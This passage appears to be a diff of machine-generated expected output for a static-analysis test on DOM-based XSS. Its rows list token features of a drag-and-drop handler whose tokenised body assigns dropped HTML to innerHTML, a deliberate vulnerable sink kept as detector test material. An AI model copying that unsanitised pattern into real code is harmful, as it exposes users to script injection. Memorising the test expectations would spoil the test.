autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:44 | file = ... iles[i] | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:44 | file = ... iles[i] | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:44 | file = ... iles[i] | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:22 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:22 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:22 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:22 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:22 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:35 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:35 | e.dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:35 | e.dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:35 | e.dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:35 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:41 | e.dataTransfer.files | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:41 | e.dataTransfer.files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:41 | e.dataTransfer.files | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:41 | e.dataTransfer.files | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:41 | e.dataTransfer.files | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:44 | e.dataT ... iles[i] | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:44 | e.dataT ... iles[i] | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:44 | e.dataT ... iles[i] | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:44 | e.dataT ... iles[i] | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:22:66:44 | e.dataT ... iles[i] | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:24:66:35 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:24:66:35 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:24:66:35 | dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:24:66:35 | dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:24:66:35 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:37:66:41 | files | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:37:66:41 | files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:37:66:41 | files | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:37:66:41 | files | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:37:66:41 | files | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:43:66:43 | i | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:43:66:43 | i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:43:66:43 | i | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:43:66:43 | i | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:43:66:43 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:9 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:9 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:9 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:9 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:9 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:22 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:22 | e.dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:22 | e.dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:22 | e.dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:22 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:28 | e.dataTransfer.types | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:28 | e.dataTransfer.types | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:28 | e.dataTransfer.types | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:28 | e.dataTransfer.types | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:28 | e.dataTransfer.types | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:37 | e.dataT ... ncludes | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:37 | e.dataT ... ncludes | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:37 | e.dataT ... ncludes | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:37 | e.dataT ... ncludes | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:37 | e.dataT ... ncludes | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | e.dataT ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | e.dataT ... /html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | e.dataT ... /html') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | e.dataT ... /html') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | e.dataT ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | exceptional return of e.dataT ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | exceptional return of e.dataT ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | exceptional return of e.dataT ... /html') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | exceptional return of e.dataT ... /html') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:9:70:50 | exceptional return of e.dataT ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:11:70:22 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:11:70:22 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:11:70:22 | dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:11:70:22 | dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:11:70:22 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:24:70:28 | types | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:24:70:28 | types | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:24:70:28 | types | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:24:70:28 | types | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:24:70:28 | types | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:30:70:37 | includes | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:30:70:37 | includes | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:30:70:37 | includes | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:30:70:37 | includes | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:30:70:37 | includes | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:39:70:49 | 'text/html' | CalleeFlexibleAccessPath | e.dataTransfer.types.includes | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:39:70:49 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:39:70:49 | 'text/html' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13586,6 +100957,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:39:70:49 | 'text/html' | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:39:70:49 | 'text/html' | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:70:39:70:49 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:23 | droppedHtml | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:23 | droppedHtml | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:23 | droppedHtml | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:23 | droppedHtml | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:23 | droppedHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | dropped ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | dropped ... /html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | dropped ... /html') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | dropped ... /html') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | dropped ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | droppedHtml | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | droppedHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | droppedHtml | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | droppedHtml | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:13:71:61 | droppedHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:27 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:27 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:27 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:27 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:27 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:40 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:40 | e.dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:40 | e.dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:40 | e.dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:40 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:48 | e.dataT ... getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:48 | e.dataT ... getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:48 | e.dataT ... getData | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:48 | e.dataT ... getData | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:48 | e.dataT ... getData | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | exceptional return of e.dataT ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | exceptional return of e.dataT ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | exceptional return of e.dataT ... /html') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | exceptional return of e.dataT ... /html') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:27:71:61 | exceptional return of e.dataT ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:29:71:40 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:29:71:40 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:29:71:40 | dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:29:71:40 | dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:29:71:40 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:42:71:48 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:42:71:48 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:42:71:48 | getData | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e 